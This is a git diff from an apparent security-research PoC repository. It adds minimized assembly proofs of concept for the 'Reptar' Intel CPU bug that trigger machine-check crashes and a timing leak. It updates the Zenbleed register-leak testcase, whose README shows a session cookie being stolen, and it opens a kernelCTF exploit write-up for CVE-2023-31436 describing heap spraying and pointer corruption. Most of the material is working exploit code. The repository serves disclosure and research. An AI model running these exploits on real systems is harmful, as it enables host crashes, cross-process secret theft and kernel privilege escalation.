+ .after_reptar_alias: + times 100 int3 + + .skip_reptar_alias: + mov cl, 7 + align 32 + call .loop_for_every_iteration + .end_of_program: + nop diff --git a/pocs/cpus/reptar/minimized/reptar.loopless.elf.asm b/pocs/cpus/reptar/minimized/reptar.loopless.elf.asm new file mode 100644 index 00000000..a259f15b --- /dev/null +++ b/pocs/cpus/reptar/minimized/reptar.loopless.elf.asm @@ -0,0 +1,81 @@ +BITS 64 + +; rax ; USED (for CPUID temporarily) +; rbx ; USED (for CPUID temporarily) +; rcx ; USED (for CPUID and REP MOVSB) +; rdx ; USED (temporarily and for CPUID) +; rbp ; USED (magic 0xCC) +; rsp ; USED (for counter) +; rsi ; USED (for REP MOVSB) +; rdi ; USED (for REP MOVSB) +; r8 ; NOT USED +; r9 ; USED (data address) +; r10 ; NOT USED +; r11 ; NOT USED +; r12 ; NOT USED +; r13 ; NOT USED +; r14 ; NOT USED +; r15 ; NOT USED + +global _start + +%macro loopless_reptar 0 + align 128 + %%loop_for_every_iteration: + ; FLUSH TO MAKE INSTRUCTIONS BELOW SLOW + clflush [one] + clflush [magic] + clflush [r9] + clflush [r9+64] + clflush [r9+128] + mfence + lfence + sfence + cpuid + + add r9, [r9] + mov rdx, [r9+64] + lea rax, [r9] + div qword [one+rdx] + lea r9, [rax] + mov rsi, [r9] + cmp rbp, [magic+rsi+rdx] + cmove rsi, r9 + mov rdi, [r9+128+rdx] + lea rdi, [rsi+rdi] + mov ecx, [one+rdx] + xor ebp, ebp + + align 128 + %%reptar: + rep + db 0x44; rex.r + movsb + %%after_reptar: + rep nop + mov ebp, 0xcccccccc + nop +%endmacro + +section .data + one: dq 0x1 + magic: dq 0xcccccccc + data: times 512 db 0 + +section .text + _start: + mov r9, data + mov ebp, 0xcccccccc + xor rsp, rsp + ; make sure these dont pf + clflush [data] + clflush [one] + clflush [magic] + mov rax, 24 ; sched_yield + syscall + %rep 2 + loopless_reptar + inc rsp + %endrep + .end_of_program: + hlt diff --git a/pocs/cpus/reptar/minimized/reptar.mce.boot.bin.asm b/pocs/cpus/reptar/minimized/reptar.mce.boot.bin.asm new file mode 100644 index 00000000..7e2e0e65 --- /dev/null +++ b/pocs/cpus/reptar/minimized/reptar.mce.boot.bin.asm @@ -0,0 +1,24 @@ +%macro LONG_MODE_BOOT_PAYLOAD 0 + xor rbx, rbx + xor ecx, ecx + lea rsi, [rsp+1] + mov rdi, rsi + times 8*64*64/4 pause + %rep 32*8 ; icache has 8 ways 64 sets + clflush [rdi-1] ; 4uops ; 4 bytes + clflush [rsi+63]; 4uops ; 4 bytes + dec rsi ; 1uop ; 3 bytes + dec rdi ; 1uop ; 3 bytes + times 2 nop ; 2uops ; 2 bytes + ; 16 byte boundary + 2 ways + inc rcx ; 1uop ; 3 bytes + rep + db 0x44; rex.r + movsb ; msrom ptr ; 3 bytes + pause + align 64 ; icache line size + %endrep + jmp $ +%endmacro + +%include "third_party/long_mode_boot.asm" diff --git a/pocs/cpus/reptar/minimized/reptar.mce.elf.asm b/pocs/cpus/reptar/minimized/reptar.mce.elf.asm new file mode 100644 index 00000000..9c5bb6d4 --- /dev/null +++ b/pocs/cpus/reptar/minimized/reptar.mce.elf.asm @@ -0,0 +1,32 @@ +BITS 64 + +%define MCE_INSTRUCTION pause +; Define MCE_INSTRUCTION as an env var +%ifenv %!MCE_INSTRUCTION + %define MCE_INSTRUCTION %!MCE_INSTRUCTION +%endif + +global _start + +section .text + _start: + lea rsi, [rsp+1] + mov rdi, rsi + align 0x1000 + times 8*64*64 MCE_INSTRUCTION + .many_reptars: + %rep 64*8 ; icache has 8 ways 64 sets + clflush [rdi-1] ; 4uops ; 4 bytes + clflush [rsi+63]; 4uops ; 4 bytes + dec rsi ; 1uop ; 3 bytes + dec rdi ; 1uop ; 3 bytes + times 2 nop ; 2uops ; 2 bytes + ; 16 byte boundary + 2 ways + inc rcx ; 1uop ; 3 bytes + rep + db 0x44; rex.r + movsb ; msrom ptr ; 3 bytes + MCE_INSTRUCTION + align 64 ; icache line size + %endrep + times 8*64*64*100 MCE_INSTRUCTION diff --git 
a/pocs/cpus/reptar/minimized/reptar.spec.elf.asm b/pocs/cpus/reptar/minimized/reptar.spec.elf.asm new file mode 100644 index 00000000..1ad70302 --- /dev/null +++ b/pocs/cpus/reptar/minimized/reptar.spec.elf.asm @@ -0,0 +1,82 @@ +BITS 64 + +global _start + +%define OUTPUT_SIZE 32 +%define OBF_PRIME 7 + +section .data + crash_pad: times 0x10000 db 0 + far_away: times 0x1000 db 0 + output: times OUTPUT_SIZE * 4 db 0 + +section .text + clean_crash_pad: + %assign i 0 + %rep 0x10000 / 64 + clflush [crash_pad + i * 64] + %assign i i+1 + %endrep + ret + + check_leak: + %assign i 0 + %rep OUTPUT_SIZE + mfence + rdtsc + mov r10, rax + mov rax, [crash_pad + (64 * OBF_PRIME) * i] + mfence + rdtsc + sub rax, r10 + mov [output + 4 * i], eax + %assign i i + 1 + %endrep + ret + + print_output: + mov rax, 1 + mov rdi, 1 + mov rsi, output + mov rdx, OUTPUT_SIZE * 4 + syscall + ret + + exit: + mov rax, 60 + mov rdi, 0 + syscall + ret + + _start: + call clean_crash_pad + lea eax, [crash_pad + 3 * 64 * OBF_PRIME ] + mov ebx, 64 * OBF_PRIME + xor ecx, ecx + lea rsi, [rsp] + lea rdi, [rsp] + lea r11, [far_away] + mov [r11], r11 + clflush [r11] + align 0x1000 + .reptar: + ; 16 bytes + cmp [r11], rbx ; 3 bytes + jne .after_reptar ; 6 bytes + inc ecx ; 2 bytes + add eax, ebx ; 2 bytes + mov ebp, [eax] ; 3 bytes + ; 16 bytes + clflush [rsp+127] ; 4 bytes + mov [rsp], rax ; 4 bytes + rep ; 1 byte + db 0x44; rex.r ; 1 byte + movsb ; 1 byte + rep ; 1 byte + nop ; 1 byte + align 0x1000 + times 0x1000*8 rep pause + .after_reptar: + call check_leak + call print_output + call exit diff --git a/pocs/cpus/reptar/minimized/reptar.uncan.elf.bin.asm b/pocs/cpus/reptar/minimized/reptar.uncan.elf.bin.asm new file mode 100644 index 00000000..50f2e569 --- /dev/null +++ b/pocs/cpus/reptar/minimized/reptar.uncan.elf.bin.asm @@ -0,0 +1,35 @@ +%define TINY_ELF_BASE_ADDRESS 0x7fffffffe000 +%macro TINY_ELF_PAYLOAD 0 +_start: + lea rax, [rsp - 0x1000] + mov r15, .skip_reptar_alias + jmp r15 + align 16 + .loop_for_every_iteration: + .loop_only_on_bug: + clflush [rax] + clflush [rax+64] + mov rsi, rax + mov rdi, rax + mov cl, 1 + align 16 + inc rbp + clflush [rax] + clflush [rax+1] + .reptar: + rep + db 0x44; rex.r + movsb + .after_reptar: + pause + times 64 nop + jmp r15 + .skip_reptar_alias: + inc rdx + jmp .loop_for_every_iteration + .end_of_program: + int3 + int3 +%endmacro + +%include "third_party/tiny_elf.asm" diff --git a/pocs/cpus/reptar/minimized/reptar.vdso.elf.bin.asm b/pocs/cpus/reptar/minimized/reptar.vdso.elf.bin.asm new file mode 100644 index 00000000..22a87338 --- /dev/null +++ b/pocs/cpus/reptar/minimized/reptar.vdso.elf.bin.asm @@ -0,0 +1,60 @@ +%define TINY_ELF_BASE_ADDRESS 0x7ffff7ff8000 +%macro TINY_ELF_PAYLOAD 0 +_start: + lea rax, [rsp - 0x1000] + mov rbx, rax + mov r14, 0x41 + xor rbp, rbp + mov rdx, .end_of_program + lea r13, [rsp-0x4000] + mov r15, .skip_reptar_alias + push rdx + xor rdx, rdx + align 128 + times 0x700 nop + .loop_for_every_iteration: + .loop_only_on_bug: + clflush [rax] + clflush [rax+64] + mov rsi, rax + mov rdi, rax + mov cl, 1 + add rdx, 1 + mov r9, rdx + sub r9, rbp + cmp r9, 0xb0 ; we are past vdso + cmova rax, r13 ; this will PF but recover + cmova rbx, r14 + align 64 + times 64-16 nop + clflush [rax] + clflush [rbx+1] + .reptar: + rep + db 0x44; rex.r + movsb + .after_reptar: + rep + times 64 nop + jmp r15 + + .reptar_alias: + nop + nop + nop + .after_reptar_alias: + times 100 nop + ; kill + mov eax, 0 + mov ebx, 0 + int 0x80 + + .skip_reptar_alias: + inc rbp + jmp .loop_for_every_iteration 
+ .end_of_program: + int3 + int3 +%endmacro + +%include "third_party/tiny_elf.asm" diff --git a/pocs/cpus/reptar/minimized/reptar.xlat.elf.asm b/pocs/cpus/reptar/minimized/reptar.xlat.elf.asm new file mode 100644 index 00000000..de1eb7c7 --- /dev/null +++ b/pocs/cpus/reptar/minimized/reptar.xlat.elf.asm @@ -0,0 +1,50 @@ +BITS 64 + +global _start + +section .text + _start: + mov rbx, data + lea rsi, [rsp+1] + mov rdi, rsi + jmp .suffix + .attack: + %rep 1 + align 0x1000 + ; 16 bytes + times 4 nop ; 4 bytes + dec rsi ; 3 bytes + dec rdi ; 3 bytes + inc rdx ; 3 bytes + inc rcx ; 3 bytes + ; 16 bytes + clflush [rdi] ; 3 bytes + clflush [rsi+64] ; 4 bytes + mov [rsp], rdx ; 4 bytes + rep ; 1 byte + db 0x44; rex.r ; 1 byte + movsb ; 1 byte + rep ; 1 byte + nop ; 1 byte + %endrep + .suffix: + align 0x1000 + times 0x1000*8 xlat ; mov al, ds:[ebx+al] + mov dil, dl ; counter + syscall + mov rax, 1 ; exit + xor ecx, ecx; clear ecx + jmp .attack + +section .data + align 0x1000 + data: + db 24 ; first iteration (yield) + db 60 ; second iteration (exit) + times 22 db 34 + db 24 ; data[24]=24 + times 9 db 34 + db 34 ; data[34]=34 + times 25 db 34 + db 60 ; data[60]=60 + times 0x1000-60 db 34 ; (pause) diff --git a/pocs/cpus/reptar/minimized/third_party/long_mode_boot.asm b/pocs/cpus/reptar/minimized/third_party/long_mode_boot.asm new file mode 100644 index 00000000..91a62921 --- /dev/null +++ b/pocs/cpus/reptar/minimized/third_party/long_mode_boot.asm @@ -0,0 +1,200 @@ +; Stolen from https://wiki.osdev.org/Entering_Long_Mode_Directly +%ifnmacro LONG_MODE_BOOT_PAYLOAD + %macro LONG_MODE_BOOT_PAYLOAD 0 + ; Display "Hello World!" + mov edi, 0x00b8000 + + mov rax, 0x1F6C1F6C1F651F48 + mov [edi],rax + + mov rax, 0x1F6F1F571F201F6F + mov [edi + 8], rax + + mov rax, 0x1F211F641F6C1F72 + mov [edi + 16], rax + + jmp $ + %endmacro +%endif + +%define FREE_SPACE 0x1000 + +ORG 0x7C00 +BITS 16 + +; Main entry point where BIOS leaves us. + +Main: + jmp 0x0000:.FlushCS ; Some BIOS' may load us at 0x0000:0x7C00 while other may load us at 0x07C0:0x0000. + ; Do a far jump to fix this issue, and reload CS to 0x0000. + +.FlushCS: + xor ax, ax + + ; Set up segment registers. + mov ss, ax + ; Set up stack so that it starts below Main. + mov sp, Main + + mov ds, ax + mov es, ax + mov fs, ax + mov gs, ax + cld + + mov ah, 0x02 + mov al, 1 + LongProgramSize/512 + mov ch, 0x00 + mov dh, 0x00 + mov cl, 0x02 + mov dl, 0x00 + mov bx, LongProgram + int 0x13 + + ; Point edi to a free space bracket. + mov edi, FREE_SPACE + ; Switch to Long Mode. + jmp SwitchToLongMode + +BITS 16 + + +%define PAGE_PRESENT (1 << 0) +%define PAGE_WRITE (1 << 1) + +%define CODE_SEG 0x0008 +%define DATA_SEG 0x0010 + +ALIGN 4 +IDT: + .Length dw 0 + .Base dd 0 + +; Function to switch directly to long mode from real mode. +; Identity maps the first 2MiB. +; Uses Intel syntax. + +; es:edi Should point to a valid page-aligned 16KiB buffer, for the PML4, PDPT, PD and a PT. +; ss:esp Should point to memory that can be used as a small (1 uint32_t) stack + +SwitchToLongMode: + ; Zero out the 16KiB buffer. + ; Since we are doing a rep stosd, count should be bytes/4. + push di ; REP STOSD alters DI. + mov ecx, 0x1000 + xor eax, eax + cld + rep stosd + pop di ; Get DI back. + + + ; Build the Page Map Level 4. + ; es:di points to the Page Map Level 4 table. + lea eax, [es:di + 0x1000] ; Put the address of the Page Directory Pointer Table in to EAX. + or eax, PAGE_PRESENT | PAGE_WRITE ; Or EAX with the flags - present flag, writable flag. 
+ mov [es:di], eax ; Store the value of EAX as the first PML4E. + + + ; Build the Page Directory Pointer Table. + lea eax, [es:di + 0x2000] ; Put the address of the Page Directory in to EAX. + or eax, PAGE_PRESENT | PAGE_WRITE ; Or EAX with the flags - present flag, writable flag. + mov [es:di + 0x1000], eax ; Store the value of EAX as the first PDPTE. + + + ; Build the Page Directory. + lea eax, [es:di + 0x3000] ; Put the address of the Page Table in to EAX. + or eax, PAGE_PRESENT | PAGE_WRITE ; Or EAX with the flags - present flag, writeable flag. + mov [es:di + 0x2000], eax ; Store to value of EAX as the first PDE. + + + push di ; Save DI for the time being. + lea di, [di + 0x3000] ; Point DI to the page table. + mov eax, PAGE_PRESENT | PAGE_WRITE ; Move the flags into EAX - and point it to 0x0000. + + + ; Build the Page Table. +.LoopPageTable: + mov [es:di], eax + add eax, 0x1000 + add di, 8 + cmp eax, 0x200000 ; If we did all 2MiB, end. + jb .LoopPageTable + + pop di ; Restore DI. + + ; Disable IRQs + mov al, 0xFF ; Out 0xFF to 0xA1 and 0x21 to disable all IRQs. + out 0xA1, al + out 0x21, al + + nop + nop + + lidt [IDT] ; Load a zero length IDT so that any NMI causes a triple fault. + + ; Enter long mode. + mov eax, 10100000b ; Set the PAE and PGE bit. + mov cr4, eax + + mov edx, edi ; Point CR3 at the PML4. + mov cr3, edx + + mov ecx, 0xC0000080 ; Read from the EFER MSR. + rdmsr + + or eax, 0x00000100 ; Set the LME bit. + wrmsr + + mov ebx, cr0 ; Activate long mode - + or ebx,0x80000001 ; - by enabling paging and protection simultaneously. + mov cr0, ebx + + lgdt [GDT.Pointer] ; Load GDT.Pointer defined below. + + jmp CODE_SEG:LongMode ; Load CS with 64 bit segment and flush the instruction cache + + + ; Global Descriptor Table +GDT: +.Null: + dq 0x0000000000000000 ; Null Descriptor - should be present. + +.Code: + dq 0x00209A0000000000 ; 64-bit code descriptor (exec/read). + dq 0x0000920000000000 ; 64-bit data descriptor (read/write). + +ALIGN 4 + dw 0 ; Padding to make the "address of the GDT" field aligned on a 4-byte boundary + +.Pointer: + dw $ - GDT - 1 ; 16-bit Size (Limit) of GDT. + dd GDT ; 32-bit Base Address of GDT. (CPU will zero extend to 64-bit) + + +[BITS 64] +LongMode: + mov ax, DATA_SEG + mov ds, ax + mov es, ax + mov fs, ax + mov gs, ax + mov ss, ax + + ; Blank out the screen to a blue color. + mov edi, 0xB8000 + mov rcx, 500 ; Since we are clearing uint64_t over here, we put the count as Count/4. + mov rax, 0x1F201F201F201F20 ; Set the value to set the screen to: Blue background, white foreground, blank spaces. + rep stosq ; Clear the entire screen. 
+
+    jmp LongProgram
+
+BITS 16
+
+times 510 - ($-$$) db 0
+dw 0xAA55
+
+[BITS 64]
+LongProgram:
+    LONG_MODE_BOOT_PAYLOAD
+
+LongProgramSize equ $ - LongProgram
diff --git a/pocs/cpus/reptar/minimized/third_party/tiny_elf.asm b/pocs/cpus/reptar/minimized/third_party/tiny_elf.asm
new file mode 100644
index 00000000..48129c30
--- /dev/null
+++ b/pocs/cpus/reptar/minimized/third_party/tiny_elf.asm
@@ -0,0 +1,48 @@
+; stolen from https://stackoverflow.com/questions/53382589/smallest-executable-program-x86-64
+%ifndef TINY_ELF_BASE_ADDRESS
+    %define TINY_ELF_BASE_ADDRESS 0x400000
+%endif
+
+%ifnmacro TINY_ELF_PAYLOAD
+    %macro TINY_ELF_PAYLOAD 0
+    _start:
+    %endmacro
+%endif
+
+bits 64
+org TINY_ELF_BASE_ADDRESS
+
+ehdr:           ; Elf64_Ehdr
+    db 0x7F, "ELF", 2, 1, 1, 0 ; e_ident
+    times 8 db 0
+    dw 2        ; e_type
+    dw 62       ; e_machine
+    dd 1        ; e_version
+    dq _start   ; e_entry
+    dq text_phdr - $$ ; e_phoff
+    dq 0        ; e_shoff
+    dd 0        ; e_flags
+    dw ehdrsize ; e_ehsize
+    dw phdrsize ; e_phentsize
+    dw 1        ; e_phnum
+    dw 0        ; e_shentsize
+    dw 0        ; e_shnum
+    dw 0        ; e_shstrndx
+
+ehdrsize equ $ - ehdr
+
+text_phdr:      ; Elf64_Phdr
+    dd 1        ; p_type
+    dd 5        ; p_flags
+    dq 0        ; p_offset
+    dq $$       ; p_vaddr
+    dq $$       ; p_paddr
+    dq textsize ; p_filesz
+    dq textsize ; p_memsz
+    dq 0x1000   ; p_align
+
+phdrsize equ $ - text_phdr
+
+TINY_ELF_PAYLOAD
+
+textsize equ $ - $$
\ No newline at end of file
diff --git a/pocs/cpus/reptar/syscalls.asm b/pocs/cpus/reptar/syscalls.asm
new file mode 100644
index 00000000..2658ffbf
--- /dev/null
+++ b/pocs/cpus/reptar/syscalls.asm
@@ -0,0 +1,5 @@
+%define SYS_sched_yield 0x18
+%define SYS32_sched_yield 0x9e
+%define SYS_exit 0x3c
+%define SYS_alarm 0x25
+%define SYS_pause 0x22
diff --git a/pocs/cpus/reptar/threads.c b/pocs/cpus/reptar/threads.c
new file mode 100644
index 00000000..e96e8bed
--- /dev/null
+++ b/pocs/cpus/reptar/threads.c
@@ -0,0 +1,52 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <stdbool.h>
+#include <string.h>
+#include <unistd.h>
+#include <sched.h>
+#include <pthread.h>
+#include <err.h>
+#include <sys/types.h>
+#include <sys/time.h>
+#include <sys/resource.h>
+
+#include "threads.h"
+
+// This wrapper spawns a thread locked to a specific CPU.
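+// Returns the new thread's handle, or 0 if cpu is negative or start_routine
+// is NULL; exits the process if the thread cannot be pinned or started.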
+pthread_t spawn_thread_core(void *(*start_routine)(void *), void *restrict arg, int cpu)
+{
+    pthread_t tid = 0;
+    pthread_attr_t attr;
+    cpu_set_t set;
+
+    // Unspecified
+    if (cpu < 0 || !start_routine)
+        return tid;
+
+    pthread_attr_init(&attr);
+    CPU_ZERO(&set);
+    CPU_SET(cpu, &set);
+
+    if (pthread_attr_setaffinity_np(&attr, sizeof(cpu_set_t), &set) != 0)
+        err(EXIT_FAILURE, "failed to lock thread to specified core %d", cpu);
+    if (pthread_create(&tid, &attr, start_routine, arg) != 0)
+        err(EXIT_FAILURE, "failed to start thread on specified core %d", cpu);
+    pthread_attr_destroy(&attr);
+    return tid;
+}
+
+int set_cpu_affinity(int cpu)
+{
+    cpu_set_t set;
+    CPU_ZERO(&set);
+    CPU_SET(cpu, &set);
+
+    if (sched_setaffinity(0, sizeof(set), &set) != 0) {
+        err(EXIT_FAILURE, "failed to set cpu affinity");
+    }
+    return 0;
+}
diff --git a/pocs/cpus/reptar/threads.h b/pocs/cpus/reptar/threads.h
new file mode 100644
index 00000000..35f9af9d
--- /dev/null
+++ b/pocs/cpus/reptar/threads.h
@@ -0,0 +1,7 @@
+#ifndef __THREADS_H
+#define __THREADS_H
+
+pthread_t spawn_thread_core(void *(*start_routine)(void *), void *restrict arg, int cpu);
+int set_cpu_affinity(int cpu);
+
+#endif
diff --git a/pocs/cpus/reptar/util.c b/pocs/cpus/reptar/util.c
new file mode 100644
index 00000000..14f6a646
--- /dev/null
+++ b/pocs/cpus/reptar/util.c
@@ -0,0 +1,79 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdarg.h>
+#include <stdbool.h>
+#include <string.h>
+#include <unistd.h>
+#include <err.h>
+
+#include "util.h"
+
+bool quiet;
+
+void logmsg(char *format, ...)
+{
+    va_list ap;
+    // Try to limit console noise.
+    if (quiet == true)
+        return;
+
+    // Print a debugging message.
+    va_start(ap, format);
+    vfprintf(stderr, format, ap);
+    fputc('\n', stderr);
+    va_end(ap);
+    return;
+}
+
+void print(char *format, ...)
+{
+    va_list ap;
+    // Try to limit console noise.
+    if (quiet == true)
+        return;
+
+    // Print a debugging message.
+    va_start(ap, format);
+    vfprintf(stdout, format, ap);
+    va_end(ap);
+    return;
+}
+
+bool num_inrange(char *range, int num)
+{
+    char *r, *s, *e;
+
+    // Example:
+    //  1,2,3,4-8,2
+
+    if (range == NULL)
+        return false;
+
+    s = strtok_r(strdupa(range), ",", &r);
+
+    while (s) {
+        int start;
+        int end;
+
+        start = end = strtoul(s, &e, 0);
+
+        if (*e == '-') {
+            end = strtoul(++e, &e, 0);
+        }
+
+        if (*e != '\0' || end < start) {
+            errx(EXIT_FAILURE, "The range %s was not valid (example: 1,2,3,4-5)", s);
+        }
+
+        if (num >= start && num <= end)
+            return true;
+
+        s = strtok_r(NULL, ",", &r);
+    }
+
+    return false;
+}
diff --git a/pocs/cpus/reptar/util.h b/pocs/cpus/reptar/util.h
new file mode 100644
index 00000000..2456004d
--- /dev/null
+++ b/pocs/cpus/reptar/util.h
@@ -0,0 +1,10 @@
+#ifndef __UTIL_H
+#define __UTIL_H
+
+extern bool quiet;
+
+void logmsg(char *format, ...);
+void print(char *format, ...);
+bool num_inrange(char *range, int num);
+
+#endif
diff --git a/pocs/cpus/zenbleed/README.md b/pocs/cpus/zenbleed/README.md
index 48ca42f3..b7f6a08d 100644
--- a/pocs/cpus/zenbleed/README.md
+++ b/pocs/cpus/zenbleed/README.md
@@ -29,6 +29,7 @@ We have confirmed this bug is reproducible on at least the following SKUs:
 - `AMD Ryzen Threadripper PRO 3945WX 12-Cores`
 - `AMD Ryzen 7 PRO 4750GE with Radeon Graphics`
 - `AMD Ryzen 7 5700U`
+- `AMD Ryzen 7 4800H`
 - `AMD EPYC 7B12`
 
 In general, we believe all Zen 2 processors are affected, including "Rome"
@@ -85,12 +86,11 @@ Please type `make` to build the testcase.
 
 ```
 $ ./zenbleed -h
-*** EMBARGOED SECURITY ISSUE -- DO NOT DISTRIBUTE! ***
 ZenBleed Testcase -- taviso@google.com
 
 NOTE: Try -h to see configuration options
 
-Usage: ./zenleak [OPTIONS]
+Usage: ./zenbleed [OPTIONS]
     -v N    Select a variant leak kernel, different kernels work better on different SKUs.
    -m N    Stop after leaking N values, useful for benchmarking.
    -H N    Spawn a 'hammer' thread on core N, produces recognizable values for testing.
@@ -112,7 +112,7 @@ For example, a command like `while true; do sort < /etc/passwd > /dev/null; done
 This should generate some recognizable register throughput, like this:
 
 ```
-$ ./zenleak
+$ ./zenbleed
 Thread 0x7f26b92346c0 running on CPU 0
 Thread 0x7f26b8a336c0 running on CPU 2
 Thread 12: "999:999:systemd "
@@ -169,7 +169,7 @@ registers for a string that looks like that. As it learns more of the string
 that follows, it will extend the search to continue the pattern.
 
 ```
-$ ./zenleak -q -p "SID="
+$ ./zenbleed -q -p "SID="
 SID=cieX4meceechoo2UThooh5uu; 1P_JAR=2023-05-17-21; S^C
 ```
diff --git a/pocs/cpus/zenbleed/pattern.c b/pocs/cpus/zenbleed/pattern.c
index 3bb97131..124b1675 100644
--- a/pocs/cpus/zenbleed/pattern.c
+++ b/pocs/cpus/zenbleed/pattern.c
@@ -19,8 +19,6 @@
 //
 // This is a Work-in-Progress testcase for the Zenbleed vulnerability.
 //
-// ** DO NOT DISTRIBUTE - EMBARGOED SECURITY ISSUE **
-//
 // Tavis Ormandy
 //
diff --git a/pocs/cpus/zenbleed/zenbleed.c b/pocs/cpus/zenbleed/zenbleed.c
index 50639602..1e95945c 100644
--- a/pocs/cpus/zenbleed/zenbleed.c
+++ b/pocs/cpus/zenbleed/zenbleed.c
@@ -19,8 +19,6 @@
 //
 // This is a Work-in-Progress testcase for the Zenbleed vulnerability.
 //
-// ** DO NOT DISTRIBUTE - EMBARGOED SECURITY ISSUE **
-//
 // Tavis Ormandy
 //
@@ -216,7 +214,6 @@ static pthread_t spawn_thread_core(void *(*start_routine)(void *), void *restric
 static void print_banner()
 {
-    logmsg("*** EMBARGOED SECURITY ISSUE -- DO NOT DISTRIBUTE! ***");
     logmsg("ZenBleed Testcase -- taviso@google.com");
     logmsg("");
     logmsg("NOTE: Try -h to see configuration options");
diff --git a/pocs/cpus/zenbleed/zenleak.asm b/pocs/cpus/zenbleed/zenleak.asm
index 5a0104b5..caf9b45f 100644
--- a/pocs/cpus/zenbleed/zenleak.asm
+++ b/pocs/cpus/zenbleed/zenleak.asm
@@ -3,8 +3,6 @@ BITS 64
 ;
 ; This is a Work-in-Progress testcase for the Zenbleed vulnerability.
 ;
-; ** DO NOT DISTRIBUTE - EMBARGOED SECURITY ISSUE **
-;
 ; Tavis Ormandy
 ;
diff --git a/pocs/linux/kernelctf/CVE-2023-31436_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/docs/exploit.md
new file mode 100644
index 00000000..4a735fb6
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/docs/exploit.md
@@ -0,0 +1,427 @@
+Exploit Details
+===============
+
+Exploit demo for CVE-2023-31436.
+Flag: `kernelCTF{v1:mitigation-6.1-v2:1688980403:8075e41586a95a7128a3f9feb6dfddd242bcc92d}`
+
+# Summary
+
+At a high level, the exploit performs the following steps:
+
+- Spray QFQ qdiscs along with user-controlled buffers into `dyn-kmalloc-8192`
+- Spray user-controlled objects into `kmalloc-128`
+- Trigger the vulnerability so that the out-of-bounds `struct qfq_group` falls into one of the
+  user-controlled buffers, leaving us with a controllable group object
+- Use the controlled `struct qfq_group` object to corrupt the `struct qfq_sched->filter_list` member so that it
+  points to our user-controlled object in `kmalloc-128`
+
+Note: The original exploit targeted the `mitigation-6.1-broken` instance; it was later modified to work on `mitigation-6.1-v2`.
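+
+For orientation, the QFQ side of such a setup is normally driven via netlink,
+i.e. what `tc` does under the hood. A rough sketch of the shape of the setup
+(illustrative only - the parameter values here are not the exploit's exact
+ones, and the exploit performs the equivalent netlink operations directly):
+
+```
+# inside a fresh (user + net) namespace:
+ip netns add repro
+ip -n repro link set lo mtu 0x10000   # oversized MTU => oversized default lmax
+ip -n repro link set lo up
+tc -n repro qdisc add dev lo root handle 1: qfq
+tc -n repro class add dev lo parent 1: classid 1:1 qfq weight 1
+```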
+
+# Steps in Detail
+
+## Step 1: Abusing the Vulnerability
+
+Triggering the vulnerability is trivial, though actually getting something useful
+out of the out-of-bounds group is not obvious.
+Even though the pointer is used in a few places, I only identified two places which
+seem particularly interesting from an exploitation perspective:
+```c
+static void qfq_slot_insert(struct qfq_group *grp, struct qfq_aggregate *agg,
+                            u64 roundedS)
+{
+// ...
+    hlist_add_head(&agg->next, &grp->slots[i]);   // [1.1]
+    __set_bit(slot, &grp->full_slots);            // [1.2]
+}
+
+
+static void qfq_schedule_agg(struct qfq_sched *q, struct qfq_aggregate *agg)
+{
+    struct qfq_group *grp = agg->grp;
+// ...
+    s = qfq_calc_state(q, grp);
+    __set_bit(grp->index, &q->bitmaps[s]);        // [2]
+// ...
+}
+```
+
+Looking at `qfq_slot_insert` we can see that we can write a pointer to an aggregate
+into the slots array [1.1]. Controlling `i` is not trivial, but may be possible.
+This way we can potentially write a pointer into a following object in the `dyn-kmalloc-8192`
+slab.
+Eventually this could lead to a UaF scenario after the aggregate is destroyed.
+Due to the complexities involved in controlling the index along with the correct
+alignment, I decided against this path.
+
+This leaves us with a bit-set operation at a controlled index [2].
+The idea will be to flip a bit on a pointer to eventually cause a type confusion.
+Looking at `struct qfq_sched` we can see that there are only a few members
+available to us after the `bitmaps[]` member (we cannot use a negative index).
+
+```c
+struct qfq_sched {
+    struct tcf_proto __rcu *filter_list;
+    struct tcf_block *block;
+    struct Qdisc_class_hash clhash;
+
+    u64 oldV, V;                    /* Precise virtual times. */
+    struct qfq_aggregate *in_serv_agg;  /* Aggregate being served. */
+    u32 wsum;                       /* weight sum */
+    u32 iwsum;                      /* inverse weight sum */
+
+    unsigned long bitmaps[QFQ_MAX_STATE];       /* Group bitmaps. */
+    struct qfq_group groups[QFQ_MAX_INDEX + 1]; /* The groups. */
+    u32 min_slot_shift;             /* Index of the group-0 bit in the bitmaps. */
+
+    u32 max_agg_classes;            /* Max number of classes per aggr. */
+    struct hlist_head nonfull_aggs; /* Aggs with room for more classes. */
+};
+```
+
+The `nonfull_aggs` member is interesting, as this list will be used to look up
+aggregates when creating new classes:
+```c
+static struct qfq_aggregate *qfq_find_agg(struct qfq_sched *q,
+                                          u32 lmax, u32 weight)
+{
+    struct qfq_aggregate *agg;
+
+    hlist_for_each_entry(agg, &q->nonfull_aggs, nonfull_next)
+        if (agg->lmax == lmax && agg->class_weight == weight)
+            return agg;
+
+    return NULL;
+}
+```
+Originally I planned to smuggle a fake `qfq_aggregate` into the qdisc, which would
+hopefully be freed when destroying the class that possesses it.
+This way we can have a UaF in the `kmalloc-128` slab.
+However, I could not find a suitable object which would allow us to control all the
+relevant members (`lmax`, `class_weight`, `num_classes`).
+Therefore we will try to flip a bit on an object after the qdisc.
+Naturally this could be the object that we used to create the fake group; however,
+the following layout seemed easier (though less stable):
+
+```
+
++-qfq qdisc----+
+| ...          |
+| filter_list  | -------------------------------> 0100 +-tcf_proto-+
+| ...          |                                       |           |
+| bitmaps[]    |                                       |           |
+| groups[]     |                                       +-----------+
+| ...          |
++--------------+                                  0180 +-fake obj--+
+                                                       |           |
++-controlled o-+                                       |           |
+| ...          |                                       +-----------+
+| fake grp {}  |
+| ...          |          +---x------------------> 0200 +-tcf_proto-+
+| ...          |          |   x                         |           |
+|              |          |   x  flip                   |           |
++--------------+          |   x  a bit                  +-----------+
+                          |   x
++-qfq qdisc----+          |   x------------------> 0280 +-fake obj--+
+| ...          |          |                             |           |
+| filter_list  | ---------+                             |           |
+| ...          |                                        +-----------+
+| bitmaps[]    |
+| groups[]     |                                   0300 +-fake obj--+
+| ...          |                                        |           |
++--------------+                                        |           |
+                                                        +-----------+
+```
